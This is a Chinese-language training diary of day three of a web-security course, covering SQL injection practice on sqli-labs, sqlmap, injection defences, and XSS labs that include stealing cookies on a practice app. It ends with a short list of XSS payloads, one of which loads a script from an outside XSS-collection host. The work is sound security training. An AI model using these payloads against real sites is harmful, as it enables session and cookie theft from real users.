实训第三天

  1. 虚拟机安装和配置sqli-labs

物理机访问:

image-20220713103942581.png

  1. sqli-labs练习

Less-5:盲注

less-5-1.png

less-5-2.png

Less-7:文件注入

zhuru.png

result.png

Less-9:延时注入

Less-5:报错注入,使用extravalue

爆出数据库名

less-5-db.png

爆出数据表名

less-5-table.png

Less-11:post法+联合注入

less-11-col_num.png

less-11-db.png

less-11-table.png

Less-12:双引号+括号闭合

image-20220713141256904.png

  1. 初步了解sqlmap的使用
  2. 了解sql注入

概念和原理:攻击者通过注入sql语句片段,导致后端执行预期外的sql查询

危害:1.拖库 2.读写文件 3.执行系统命令

防护思路:对输入的特殊字符进行转义;正确使用预编译技术进行防护;非必要不开启文件和命令执行权限;进行库和用户的权限隔离

  1. 观看学习xss(cross site scripting)演示,学习xss的基本知识和攻击目的:攻击者嵌入自己的恶意js代码,使其他用户浏览器执行
  2. 实战btslab练习XSS窃取cookie并利用

image-20220713154248802.png

  1. 编写有弹窗的页面

image-20220713155410356.png

  1. xss挑战

level-1:尝试用输入的js元素替换test,使得页面弹窗。

img

level-2:闭合input标签

js的各种引入方式

<script>alert(1);</script> //直接嵌入script 
<input name=keyword value="" onmouseover="alert(1)"> //通过事件属性值传入script字符串
<script src='https://xsspt.com/MQzN0Z'></script> //从远程嵌入script 
<a HREF=javascript:alert(1)>aaa</a> //超链接 
或者:<a HREF=javascript:alert(1)>aaa</a> //html实体转义 
<svg onload=alert(1)> 
<svg><script>alert(1)</script>
最后修改:2022 年 07 月 13 日
如果觉得我的文章对你有用,请随意赞赏